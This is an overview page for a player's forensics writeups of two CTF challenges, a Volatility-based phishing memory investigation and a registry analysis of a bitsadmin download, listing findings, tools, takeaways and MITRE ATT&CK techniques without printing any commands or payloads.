Overview
This writeup documents my approach to solving two complex forensics challenges from QnQSec CTF 2025.
The challenges required a combination of:
- Windows memory forensics with Volatility 3
- Email forensics and phishing incident response
- Windows registry analysis and artifact examination
- Malware analysis and behavioral investigation
- AmCache forensics for execution tracking
- Scheduled task persistence identification
- Command & Control infrastructure analysis
- Threat intelligence with VirusTotal
2
Challenges Solved
8
Questions Answered
10+
Tools Used
100%
Success Rate
Challenges
Masks
A comprehensive memory forensics challenge investigating a phishing incident. Analyze a memory dump to answer 8 questions tracing the complete attack chain from email delivery to persistence establishment.
Key Findings:
- OUTLOOK.exe used for malicious attachment delivery
- OST file extraction and email timeline analysis
- CVE exploitation through RAR attachment
- AmCache forensics for SHA1/SHA256 hash correlation
- Shellcode download URL identification
- C2 server extraction from process memory
- Scheduled task persistence mechanism discovery
- Complete attack chain reconstruction
Techniques Used:
Read Full Writeup →Execution
A registry forensics challenge involving malicious command identification and malware analysis. Investigate a .reg file to uncover a Living Off The Land (LOTL) attack using Windows bitsadmin utility.
Key Findings:
- Malicious bitsadmin command in registry
- GitHub used as malware hosting platform
- Polyglot file technique - EXE disguised as JPG
- Living Off The Land (LOTL) technique abuse
- Immediate download and execution pattern
- C2 infrastructure identification via VirusTotal
- MITRE ATT&CK technique mapping
- Complete IOC extraction
Techniques Used:
Read Full Writeup →Tools & Technologies
Memory Forensics
- Volatility 3
- windows.pslist
- windows.filescan
- windows.dumpfiles
- windows.memmap
- windows.amcache
Email Forensics
- pffexport
- OST/PST Analysis
- Email Timeline Analysis
Registry & File Analysis
- Notepad++
- strings utility
- file command
- sha256sum
- Registry Analysis
Threat Intelligence
- VirusTotal
- Behavior Analysis
- Hash Lookups
- OSINT Research
Key Takeaways
Multi-Layered Analysis
Memory forensics requires analyzing multiple artifact types - process memory, registry hives, scheduled tasks, and file system metadata to reconstruct attack chains.
AmCache is Critical
When direct file extraction fails, Windows AmCache provides SHA1 hashes that can be cross-referenced with threat intelligence platforms to obtain complete file information.
LOTL Techniques
Attackers increasingly abuse legitimate Windows utilities like bitsadmin to evade detection, blending malicious activity with normal system operations.
Persistence Evolution
Modern attackers favor scheduled tasks over traditional registry Run keys, requiring forensic analysts to expand their persistence hunting techniques.
File Masquerading
Never trust file extensions - attackers disguise executables as images to bypass security filters and evade detection mechanisms.
Threat Intel Integration
Integrating VirusTotal and other threat intelligence platforms accelerates analysis by providing behavior data, network IOCs, and malware family attribution.
MITRE ATT&CK Techniques Identified
Attack Techniques Mapped
Initial Access
- T1566 - Phishing
- Malicious Email Attachment
Execution
- T1204 - User Execution
- T1059 - Command Interpreter
Persistence
- T1053 - Scheduled Task/Job
- Registry Run Keys
Defense Evasion
- T1197 - BITS Jobs
- T1036 - Masquerading
Command & Control
- T1071 - Application Layer Protocol
- HTTP/HTTPS C2
Ingress Tool Transfer
- T1105 - Remote File Copy
- Shellcode Download
Want to Learn More?
Check out the detailed writeups for step-by-step walkthroughs of each challenge.